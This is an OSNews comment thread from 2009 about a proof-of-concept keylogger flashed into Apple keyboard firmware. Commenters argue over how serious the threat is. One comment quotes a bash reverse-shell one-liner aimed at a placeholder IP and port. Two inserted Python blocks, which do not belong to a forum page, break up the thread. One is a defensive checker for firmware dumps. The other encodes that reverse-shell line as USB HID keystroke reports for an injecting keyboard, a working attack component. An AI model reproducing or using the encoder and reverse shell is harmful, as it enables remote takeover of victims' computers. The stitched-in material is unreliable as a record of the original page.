Linked by Thom Holwerda on Sat 1st Aug 2009 18:22 UTC
Almost everything has a processor and/or memory chips these days, including keyboards. Apple's keyboards are no exception: they have 8 KB of flash memory and 256 bytes of RAM. K. Chen has found a way to very easily install keyloggers and other possibly malicious code right inside these Apple keyboards (more here). Proof-of-concept code is here as well.
Leave it to Apple
by sbergman27 on Sat 1st Aug 2009 18:39 UTC
sbergman27
Member since:
2005-07-24

"The more they overthink the plumbing, the easier it is to stop up the drain" said Scotty in Star Trek III.

Leave it to Apple to take something that has always been safe before, and turn it into a security nightmare via over-design.

What other Apple-specific dangers lurk in seemingly innocuous Apple hardware, I wonder? Taking into account recent news about real life safety and security dangers in Apple hardware, and Apple's attempts to suppress news of them, it would not surprise me to see Apple mice spontaneously bursting into flames, or Apple monitors quietly deciding to start emitting x-rays.

Their corporate offices could go up in a fireball, and their sole surviving PR drone would try to blame it on Mr. Coffee.

Edited 2009-08-01 18:46 UTC

Reply Score: 2

RE: Leave it to Apple
by Thom_Holwerda on Sat 1st Aug 2009 19:45 UTC in reply to "Leave it to Apple"
Thom_Holwerda Member since:
2005-06-29

Chen theorises that it's because Apple needs to rush hardware to market, so instead of properly testing their firmware - which shouldn't be that hard, it's a frakking keyboard - they just make the firmware flashable instead. This is indeed what happened when the keyboard first came out.

What we need to know is this: how hard is it to achieve this on keyboards from other manufacturers?

Edited 2009-08-01 19:45 UTC

Reply Score: 2

RE[2]: Leave it to Apple
by sbergman27 on Sat 1st Aug 2009 19:57 UTC in reply to "RE: Leave it to Apple"
sbergman27 Member since:
2005-07-24

What we need to know is this: how hard is it to achieve this on keyboards from other manufacturers?

Even if it were possible (and I suspect this is going to turn out to be Apple specific) the exploit would surely need to be customized for the keyboard family. And for the platform.

Apple would still be the logical target because MacOSX and Apple keyboards go together like... oh... "War" and "Pestilence". If the exploit code will run, you can be reasonably certain that the keyboard is going to be Apple, and thus vulnerable, most of the time.

Note that this reasoning applies to any future hardware-based exploits, and not just to keyboards.

Edited 2009-08-01 20:06 UTC

Reply Score: 3

RE[2]: Leave it to Apple
by Johann Chua on Sun 2nd Aug 2009 02:52 UTC in reply to "RE: Leave it to Apple"
Johann Chua Member since:
2005-07-22

Now I really need to find a Griffin iMate. Never cottoned to the shiny new Apple keyboards, so I'd prefer using my old Apple Extended II keyboard when I get a Mac mini.

Reply Score: 2

shiva
Member since:
2007-01-24

A big "advantage" of Apple's exclusive hardware... :-)

Reply Score: 4

kokuyoen Member since:
2008-06-13

They're "inside" the computer! And I'm not talking about the files! People are always telling me Apple computers are safer due to better security measures. Riiiight.

Reply Score: 1

RE: Comment by kokuyoen
by sbergman27 on Sat 1st Aug 2009 19:44 UTC in reply to "Comment by kokuyoen"
sbergman27 Member since:
2005-07-24

People are always telling me Apple computers are safer due to better security measures. Riiiight.

Do the Psystar clones exhibit this egregious security hole? Or is just Apple hardware that is so unsafe?

Edited 2009-08-01 19:46 UTC

Reply Score: 3

RE[2]: Comment by kokuyoen
by DrillSgt on Sat 1st Aug 2009 19:48 UTC in reply to "RE: Comment by kokuyoen"
DrillSgt Member since:
2005-12-02

Do the Psystar clones exhibit this egregious security hole? Or is just Apple hardware that is so unsafe?


That is a really good question. Since the flaw itself is in the firmware for the keyboard, I would hazard a guess if the person was using one of the Apple keyboards, then yes, they would be. Of course I have no idea without having the hardware to test it on.

Reply Score: 2

RE[3]: Comment by kokuyoen
by sbergman27 on Sat 1st Aug 2009 20:04 UTC in reply to "RE[2]: Comment by kokuyoen"
sbergman27 Member since:
2005-07-24

Since the flaw itself is in the firmware for the keyboard, I would hazard a guess if the person was using one of the Apple keyboards, then yes, they would be.

But Psystar doesn't use Apple hardware. They come with Logitech keyboards and mice, so far as I know.

Reply Score: 2

RE[4]: Comment by kokuyoen
by shiva on Sat 1st Aug 2009 20:23 UTC in reply to "RE[3]: Comment by kokuyoen"
shiva Member since:
2007-01-24

Probably the hackintoshes are more secure than Macs because of the wide variety of hardware for PCs !

This is the reason why I am happy with my grey PC with a Linux distribution. There are M x N different hardware/software combinations for malware to infect, which is much less probable.

Reply Score: 2

RE[5]: Comment by kokuyoen
by sbergman27 on Sat 1st Aug 2009 20:44 UTC in reply to "RE[4]: Comment by kokuyoen"
sbergman27 Member since:
2005-07-24

Probably the hackintoshes are more secure than Macs because of the wide variety of hardware for PCs !

Yeah, at least the Windows monoculture exhibits variety in the hardware. MacOSX on Apple hardware is a devastating epidemic looking for a place to happen.

Edited 2009-08-01 20:44 UTC

Reply Score: 3

RE[4]: Comment by kokuyoen
by DrillSgt on Sat 1st Aug 2009 20:24 UTC in reply to "RE[3]: Comment by kokuyoen"
DrillSgt Member since:
2005-12-02

But Psystar doesn't use Apple hardware. They come with Logitech keyboards and mice, so far as I know.


Good point. It would come down to if Logitech keyboards can be exploited in this manner then.

Reply Score: 2

1984
by JayDee on Sat 1st Aug 2009 19:03 UTC
JayDee
Member since:
2009-06-02

For the next 1984 days, OSNews and every other technology news site and blog should write something negative about Apple.


You guys are on a roll! Keep it coming! ;-)

Reply Score: 4

Apple is probably not the only one
by jokkel on Sat 1st Aug 2009 19:47 UTC
jokkel
Member since:
2008-07-07

I strongly suspect that Apple is not the only one. A lot of other USB keyboards probably have the same problem.

This doesn't excuse anything of course. It's quite scary to think that your own keyboard is spying on you.

Apple is an attractive target for hacking, because exploits always make headlines. I hope Apple will cooperate more with security researchers in the future. Their security track record isn't that great. Apple relied too long and too much on security by obscurity and being a small target.

Reply Score: 2

deathshadow Member since:
2005-07-12

That would be my guess. Apple these days uses a lot of the same chips under the hood as its competitors (ok, all the same chips now) - as such I'd not be surprised to find out other USB keyboards are at risk.

Makes me glad I'm still using a nice safe, near indestructible PS/2 Model M. Actually it's a bastardization: the keyboard mechanicals are from a 370 version, the internal board and case are from the AT version with the phone jack, but I have the cable from a PS/2 one, which works (since the only difference between PS/2 and AT keyboards is the plug at the PC end).

It really is as sbergman27 said an overthinking of the plumbing.

8K of flash and 256 bytes of RAM? *** sake, what's in there, a PICAXE or an Atmel? FOR A KEYBOARD?!? Sad when a keyboard has more computing power and live storage than my first computer.

Also proves something I've been saying for years, the illusion of safety provided by Apple won't last... since once enough people are using them to be a viable target they've got little to nothing standing between the user and total pwnage compared to other OS and hardware bases.

Edited 2009-08-01 20:35 UTC

Reply Score: 2

sbergman27 Member since:
2005-07-24

Also proves something I've been saying for years, the illusion of safety provided by Apple won't last... since once enough people are using them to be a viable target they've got little to nothing standing between the user and total pwnage compared to other OS and hardware bases.

Even its Unix foundation is a bit of an illusion from a security standpoint. While the rest of the POSIX world has been moving forward with a variety of hardening techniques and security frameworks, Apple has been fine-tuning their icon colors.

Securitywise, MacOSX's Darwin underpinnings look like something out of the mid 1990s.

Reply Score: 7

tupp Member since:
2006-11-12

While the rest of the POSIX world has been moving forward with a variety of hardening techniques and security frameworks, Apple has been fine-tuning their icon colors.

This line is an instant classic!

Reply Score: 3

not impossible at all
by jabbotts on Sat 1st Aug 2009 23:13 UTC in reply to "RE: Apple is probably not the only one"
jabbotts Member since:
2007-09-06

My Logitech G15 must have some chips inside there. I can see much of it done on the driver side but still, it's much more than a simple button pad pushing signal out a ps2 or big DIN port.

I can see it now.. "WOW Accounts hijacked through keyboard zombies!"

Reply Score: 2

Kroc Member since:
2005-11-10

Sorry to burst your bubble, but your PS2 keyboard can be read from a plug socket http://news.bbc.co.uk/1/hi/technology/8147534.stm

Reply Score: 1

mrhasbean Member since:
2006-04-03

Sorry to burst your bubble, but your PS2 keyboard can be read from a plug socket http://news.bbc.co.uk/1/hi/technology/8147534.stm


Chortle

Reply Score: 2

Before everyone flies off the handle...
by darknexus on Sat 1st Aug 2009 20:37 UTC
darknexus
Member since:
2008-07-15

This certainly doesn't seem as bad as the sensationalists would like you to believe. The Apple firmware updater has to be run, a break point is set and from there your keyboard can be compromised. First off, how is a remote web site going to run this Apple firmware updater? What modern browser can arbitrarily run executables on the host machine (well, perhaps, aside from IE6 but that's hardly modern). Second, I've used the Apple firmware updater. Before it does anything, it prompts you to update the keyboard firmware. This is not something that will happen out of the blue, you must explicitly run the firmware updater first and accept the upgrade and, on OS X anyway, you then need to enter your administrator's password to confirm the action.
So what we basically have here is a vulnerability that requires physical access to the machine in order to be enabled, and further relies on the keyboard not being at the latest firmware version, as the firmware updater won't download or run an image unless it's newer than the current one installed. The only way I can see this being a serious problem is if a hacked firmware image were somehow placed on Apple's servers (rather unlikely), or dns poisoning to redirect the firmware updater to a different server (possible, but for a rather small payoff by modern standards of cracking). It's a threat, certainly, but not a huge one.

Reply Score: 6

jabbotts Member since:
2007-09-06

Interviews after this year's Pwn2Own described OS X security around the browser as pretty open. A reason it was targeted was that the Safari browser does not provide the same protective layers that other browsers offer (though, the next major version addresses this in some ways I hear). Outcome: browser can run executable code.

Now it's on the system with no sandboxing to break out of. It needs only escalate its privilege to root. Not easy on a well configured POSIX base but not impossible.

Now it's root, it redirects input/output and sends the [OK] button press when the firmware flasher requires it. Maybe it presents a spoofed layer over top of the actual firmware message box and gets it done a la social engineering.

Injecting break points is a standard part of running software and easily done with root privilege. Maybe it simply patches in memory as needed for that step.

It's not like your average skript kiddie is going to get this one but gov and criminal enterprise are already working on it. Attacks never get worse, they only ever get better. If left unpatched, this will become a problem.

Reply Score: 3

I see a lot of misinformed comments
by Lo_Phat on Sat 1st Aug 2009 21:16 UTC
Lo_Phat
Member since:
2009-07-08

All barring one have been knee jerk misinformed Fanboi style comments.

A vulnerability that requires physical access to the machine in order to be enabled, and relies on the keyboard not being at the latest firmware version (the firmware updater won't download or run an image unless it's newer than the current one installed) is hardly world shaking news.

I applaud the researchers for finding this and any other potential vulnerability but I'm not going to lie awake at night worrying about this one.

Reply Score: 0

smashIt Member since:
2005-07-06

Well, you seem to be the misinformed fanboi if you believe that Apple are the only ones that can write those magical lines of code needed to flash the firmware.

Reply Score: 2

WereCatf Member since:
2006-02-15

A vulnerability that requires physical access to the machine in order to be enabled, and relies on the keyboard not being at the latest firmware version (the firmware updater won't download or run an image unless it's newer than the current one installed) is hardly world shaking news.

Umm, they only need to disassemble the firmware updater and copy the lines of code that do the actual magic of updating the firmware, OR they can just fool it to think the firmware is not the latest available one. POOF! That was the sound of your argument just getting shot down.

Secondly, it does not require physical access: if you can get malware on the Mac then you have access to the keyboard firmware, too.

Thirdly, you don't need to get malware on the Mac at all or know any passwords or anything if you just can get physical access to the keyboard and attach it to your netbook/notebook/laptop and update the firmware there.

Reply Score: 3

darknexus Member since:
2008-07-15

But then you have this other problem... you'd need to convince the users to run it, since it couldn't be done by a web scripting language and even Safari won't just execute an arbitrary file on the machine.

Reply Score: 2

WereCatf Member since:
2006-02-15

But then you have this other problem... you'd need to convince the users to run it, since it couldn't be done by a web scripting language and even Safari won't just execute an arbitrary file on the machine.

Do you mean the case of malware infecting the computer and then patching the keyboard? Well, the malware would get on the computer the same way it usually does... either some security hole, or an unknowing user. The firmware on the keyboard doesn't need to be executed, it's always running on the keyboard as long as there's power to it..

Reply Score: 2

anduril Member since:
2005-11-11

Most people can be convinced fairly easily to do something stupid on the computer. This is arguably what makes malware so effective on Windows (Ohhh... shiny shit, let's install!). Do you really think Mac users are so superior that mom and pop wouldn't click "yes, run this crap" if it looks official?

Then it's game over. OS X isn't truly any more secure from a programming standpoint (as the researchers and hackers are showing) but rather due to sizing and time constraints. Why waste time on 5% (or whatever the install base is) and exploiting a hole when you can easily exploit a hole with a user base that's 90%?

Reply Score: 1

Oh dear god we're all doomed.
by Finchwizard on Sun 2nd Aug 2009 00:54 UTC
Finchwizard
Member since:
2006-02-01

Something needs physical access to the keyboard.....

It's almost as scary as those PS/2 key loggers that used to go between keyboard and computer; those things were an epidemic...... oh wait, no they weren't.

I mean seriously, any excuse to slam Apple these days with something everyone else does as well.

Reply Score: 4

RE: Oh dear god we're all doomed.
by WereCatf on Sun 2nd Aug 2009 01:00 UTC in reply to "Oh dear god we're all doomed."
WereCatf Member since:
2006-02-15

Something needs physical access to the keyboard.....

It's a firmware hack...you DON'T need physical access to the keyboard if you can flash the firmware via a virus/malware/backdoor/etc. So yes, it's quite a bit more serious than those PS2 keyloggers.. besides, those were rather easy to notice if you looked there. But a firmware hack cannot be detected with plain eyesight, and even in software you'd need to read the firmware and verify it against a known good one.

Reply Score: 2
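The check WereCatf describes (read the firmware back and verify it against a known-good image) is the only practical way to detect a modified keyboard, so here is what it looks like in code. This is an added example, not code from the thread or from Chen's proof of concept. It assumes you already have a byte-for-byte dump of the keyboard's 8 KB flash (how that dump is obtained is device specific and not covered here); the reference image, its known-good hash and the "patched" dump below are constructed for the demonstration.

```python
"""Compare a dumped keyboard firmware image against a known-good reference.

Added example: the REFERENCE image and PATCHED_DUMP below are constructed
stand-ins, not real Apple keyboard firmware.
"""
import hashlib
from typing import List, Tuple

FLASH_SIZE = 8 * 1024  # the keyboard's 8 KB of flash, per the article


def sha256_hex(image: bytes) -> str:
    return hashlib.sha256(image).hexdigest()


def differing_regions(reference: bytes, dump: bytes) -> List[Tuple[int, int]]:
    """Return [start, end) byte ranges where `dump` differs from `reference`.

    Contiguous mismatching bytes are merged into one region so a patched
    routine shows up as a single span rather than hundreds of offsets.
    """
    if len(reference) != len(dump):
        raise ValueError("image sizes differ: %d vs %d" % (len(reference), len(dump)))
    regions = []
    start = None
    for i, (a, b) in enumerate(zip(reference, dump)):
        if a != b and start is None:
            start = i
        elif a == b and start is not None:
            regions.append((start, i))
            start = None
    if start is not None:
        regions.append((start, len(dump)))
    return regions


def verify_firmware(dump: bytes, reference: bytes, known_good_sha256: str) -> dict:
    """Verify the reference itself (via its out-of-band hash), then the dump.

    Checking the reference hash matters: an attacker who can flash the
    keyboard may also be able to replace the reference file on the host.
    """
    reference_trusted = sha256_hex(reference) == known_good_sha256
    regions = differing_regions(reference, dump)
    return {
        "reference_trusted": reference_trusted,
        "match": reference_trusted and not regions,
        "regions": regions,
        "dump_sha256": sha256_hex(dump),
    }


# Constructed sample data (assumption: a deterministic byte pattern stands in
# for the vendor image; in practice the hash comes from the vendor or from a
# dump taken when the keyboard was known to be clean).
REFERENCE = bytes((i * 7 + 3) & 0xFF for i in range(FLASH_SIZE))
KNOWN_GOOD_SHA256 = sha256_hex(REFERENCE)

_patched = bytearray(REFERENCE)
for _i in list(range(0x1000, 0x1010)) + list(range(0x1F00, 0x1F04)):
    _patched[_i] ^= 0xFF  # XOR guarantees every patched byte differs
PATCHED_DUMP = bytes(_patched)


if __name__ == "__main__":
    for label, image in (("clean", REFERENCE), ("patched", PATCHED_DUMP)):
        result = verify_firmware(image, REFERENCE, KNOWN_GOOD_SHA256)
        print(label, "match" if result["match"] else "MODIFIED",
              ["0x%04x-0x%04x" % r for r in result["regions"]])
```

Run it as a script and the patched image is reported as modified at the two constructed offsets; a real dump that matches produces an empty region list. Note that this only tells you the flash differs from what you expect; it says nothing about what the difference does, and a firmware that lies when read back (returns the original image while running modified code) would defeat a read-back check entirely, which is why a dump must come from a method the firmware cannot intercept.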

Kabal Member since:
2005-07-09

Well, in that implementation you have to hit return a few times quickly to read the contents out, so you do have to have access to the keyboard to do anything with it.

But anyway, if I am at a point where I am already running arbitrary code on a users machine, I think I would rather install a keylogger in software that has the capability to send the keystrokes directly to my server, rather than install a much crappier keylogger into their keyboard ;)

It's a cute hack but it's not really the end of the world.

Edited 2009-08-02 01:39 UTC

Reply Score: 1

PlatformAgnostic Member since:
2006-01-02

You're right that this isn't exactly the end of the world. But it isn't a totally unreasonable thing for a bored hacker to do IN ADDITION to installing a standard software keylogger. If the attack installs a firmware rootkit in the keyboard, it would be tough to know about and eradicate, since even a totally clean install would not get rid of it.

On another note, I don't think we have any reason to believe that this problem applies solely to Apple. Other manufacturers probably also have firmware on their keyboards and perhaps they don't bother to implement a proper code-signing system on their keyboard microcontrollers (it would be prohibitively expensive probably).

Reply Score: 2

darknexus Member since:
2008-07-15

And code signing would be absolutely useless, seeing as how that signature would simply be duplicated. The thing about code signing is that it's only useful as long as the signature isn't reversed; as soon as it is, the signature might as well not even be there. On a software platform such as a typical PC or even a cell phone, this wouldn't be a big deal as the signature certificates could simply be updated in the background, but on a tiny embedded system it would be worse than useless even if they did bother to implement it. I doubt many would continuously update their keyboard firmware for new signatures, and it would be too risky to have firmware updates applied automatically without prompting in case the device was bricked due to a crash or loss of power.

Reply Score: 2

bert64 Member since:
2007-04-23

If you were to install a hardware keylogger like this, how would you get the logs out of the system?
You'd still need a software component running in order to read the logs from the flash and transmit them away somewhere, and this software component would be just as vulnerable as a regular keylogger to being removed.

This just sounds like a clever idea in theory that provides no real benefit in practice.

Reply Score: 1

WereCatf Member since:
2006-02-15

Nope, it doesn't provide much of a real benefit except in cases where you have physical access to the keyboard but the system is secured too tightly to hack into. The keyboard has room for 1000 keystrokes so it'd log your username and password, and as you most likely log in to other services too right after login, those credentials would also be stored.

Now, let's say that you've been hired to just clean the floors, wash the windows and such and you do that on the off-hours when no one else is around. You just pop out your netbook, upload the hacked firmware to all nearby machines, finish your job, and then next day download the recorded keystrokes. Voila! You have all the most used usernames and passwords of that company and can do as you please.

Just because you lack the imagination to utilize this doesn't mean it cannot be utilized by someone with more imagination.

Reply Score: 2

Bounty Member since:
2006-09-18

That's why you never let custodians with netbooks or pre-hacked hardware keyboards into your top secret area. Those damn custodians are always swapping out NICs with pre-hacked sniffing NICs, keyboards with hardware keyloggers inside the keyboards, quick cams that spy on your keyboard (or retina!), microphones in your speakers, peep hole cameras in your mouse. They replace your power cord with an ER sensing and recording one to sniff what you type. They dust your fingerprint scanner and make gel fingers. If you ever find a mousepad with a battery and a wifi chip in it, it's probably those damn custodians! Damn ACME "custodians" are always hacking stuff.

Reply Score: 3

stanbr Member since:
2009-05-22

I was thinking the same.. then I read the full article here: http://www.digitalsociety.org/apple-keyboards-hacked-and-possessed/

So, in fact, its REALLY EASY to send these to a remote server WITHOUT using another malware... ;)

From the article:
"exec /bin/sh 0</dev/tcp/IP/PORT 1>&0 2>&0

This would instantly connect the computer to the attacker’s computer and instantly give the attacker full control of the computer at which point additional rootkits could be installed."

Cya.

Reply Score: 1
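The one-liner stanbr quotes only becomes an attack if the keyboard can type it on its own, so it is worth seeing what "the keyboard types it" actually means at the USB level and why 8 KB of flash is plenty. The following is an added example, not code from the thread or from the digitalsociety.org article: it encodes a string as USB HID boot-protocol keyboard reports (the 8-byte report a plain keyboard sends on every key press) using the standard usage IDs for a US layout. The `IP` and `PORT` in the payload are the article's own placeholders, and the payload is assumed to land in a bash prompt that currently has keyboard focus, since `/dev/tcp` is a bash feature and the keystrokes go wherever the cursor is.

```python
"""Encode text as USB HID boot-protocol keyboard reports.

Added example (not the article's or Chen's code). Report layout per the USB
HID spec: byte 0 = modifier bits, byte 1 = reserved, bytes 2..7 = up to six
usage IDs from usage page 0x07. Usage IDs below are the standard US-layout
values (a=0x04 .. z=0x1d, 1=0x1e .. 9=0x26, 0=0x27, Enter=0x28, ...).
"""
from typing import List

_LETTERS = "abcdefghijklmnopqrstuvwxyz"

# Characters typed without a modifier.
_PLAIN = {
    **{c: 0x04 + i for i, c in enumerate(_LETTERS)},
    **{c: 0x1E + i for i, c in enumerate("123456789")},
    "0": 0x27, "\n": 0x28, "\t": 0x2B, " ": 0x2C, "-": 0x2D, "=": 0x2E,
    "[": 0x2F, "]": 0x30, "\\": 0x31, ";": 0x33, "'": 0x34, "`": 0x35,
    ",": 0x36, ".": 0x37, "/": 0x38,
}

# Characters that need left Shift held: same usage ID as the unshifted key.
_SHIFTED = {
    **{c.upper(): 0x04 + i for i, c in enumerate(_LETTERS)},
    "!": 0x1E, "@": 0x1F, "#": 0x20, "$": 0x21, "%": 0x22, "^": 0x23,
    "&": 0x24, "*": 0x25, "(": 0x26, ")": 0x27, "_": 0x2D, "+": 0x2E,
    "{": 0x2F, "}": 0x30, "|": 0x31, ":": 0x33, '"': 0x34, "~": 0x35,
    "<": 0x36, ">": 0x37, "?": 0x38,
}

LEFT_SHIFT = 0x02          # modifier bit 1
RELEASE = bytes(8)         # all-zero report: every key released
REPORT_SIZE = 8


def key_report(char: str) -> bytes:
    """Build the 8-byte press report for one printable character."""
    if char in _PLAIN:
        return bytes([0x00, 0x00, _PLAIN[char], 0, 0, 0, 0, 0])
    if char in _SHIFTED:
        return bytes([LEFT_SHIFT, 0x00, _SHIFTED[char], 0, 0, 0, 0, 0])
    raise ValueError("no US-layout key for %r" % char)


def encode_keystrokes(text: str) -> List[bytes]:
    """Press and release each character in turn.

    A release report after every press is required: the host only sees a
    new key when the usage ID changes, so "ee" typed as two press reports
    with no release in between would register as a single 'e'.
    """
    reports = []
    for ch in text:
        reports.append(key_report(ch))
        reports.append(RELEASE)
    return reports


def payload_bytes(text: str) -> int:
    """Flash needed to store the pre-encoded report stream for `text`."""
    return REPORT_SIZE * len(encode_keystrokes(text))


# The reverse-shell line quoted in the thread, with a trailing Enter.
# IP and PORT are the article's placeholders, left as-is.
PAYLOAD = "exec /bin/sh 0</dev/tcp/IP/PORT 1>&0 2>&0\n"


if __name__ == "__main__":
    stream = encode_keystrokes(PAYLOAD)
    print("%d keystrokes -> %d reports -> %d bytes pre-encoded (%d bytes as text)"
          % (len(PAYLOAD), len(stream), payload_bytes(PAYLOAD), len(PAYLOAD)))
    for rep in stream[:4]:
        print(rep.hex())
```

Even stored fully pre-encoded, the 42 keystrokes take 672 bytes; stored as text and encoded on the fly they take 42, so the 8 KB the article mentions leaves ample room for both this and the keystroke log. The same encoding is what a defender sees on the wire, and it also explains the caveat that Kabal raises: the reports are indistinguishable from a human typing except by timing, so the only host-side signal is a burst of reports faster than any person types.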

Drumhellar Member since:
2005-07-12

Something needs physical access to the keyboard.....


The MacOS X computer that your keyboard is plugged into has physical access to the keyboard. Actually, it has physical access to the firmware. Run a piece of malware on your desktop (which, again, has physical access to the keyboard) and you're compromised.

Reply Score: 1

Tuishimi
Member since:
2005-07-06

...some of the articles posted on OSNews are obviously the result of the OSNews teams' keyboards being hacked and taken over.

Reply Score: 3

security by obscurity
by dvhh on Sun 2nd Aug 2009 16:07 UTC
dvhh
Member since:
2006-03-20

Some of the users blind themselves. Of course this is not a remote way to hack your Mac, but it can be part of a social engineering process.
Most of the first characters typed on a system are login credentials, which can give a second foothold on the system by installing other stuff.
Of course it requires physical access, but again most "secure OS" users are downplaying some remote vulnerabilities as long as it is not root access.

Reply Score: 1

Macbooks too?
by theoreilly on Sun 2nd Aug 2009 23:42 UTC
theoreilly
Member since:
2009-08-02

I'm wondering whether this vulnerability also applies to my macbook pro. I'm guessing it does, yet remain hopeful.

Reply Score: 1

So...
by Jimbob on Mon 3rd Aug 2009 00:02 UTC
Jimbob
Member since:
2005-07-07

We sit and argue about something which sounds sensational but in reality is not a huge threat and it keeps us nicely blindsided from the troubles of the world. The man who was shown hacking the keyboard works for the CIA. Oooops... I shouldn't have said CIA with an Apple keyboard...


------

There's a knock on my door...

Edited 2009-08-03 00:03 UTC

Reply Score: 1

RE: So...
by kvarbanov on Mon 3rd Aug 2009 08:26 UTC in reply to "So..."
kvarbanov Member since:
2008-06-16

Are you sure that he works for the CIA? If yes, does it really matter? Generally, I don't care for exploits, especially if they aren't made for Linux ;) Windows users - watch out ;) ! as always ...

Reply Score: 1

RE[2]: So...
by Jimbob on Mon 3rd Aug 2009 23:03 UTC in reply to "RE: So..."
Jimbob Member since:
2005-07-07

You can always tell... it's the way they furrow their brows... dead give away... ssshhhh...

Reply Score: 1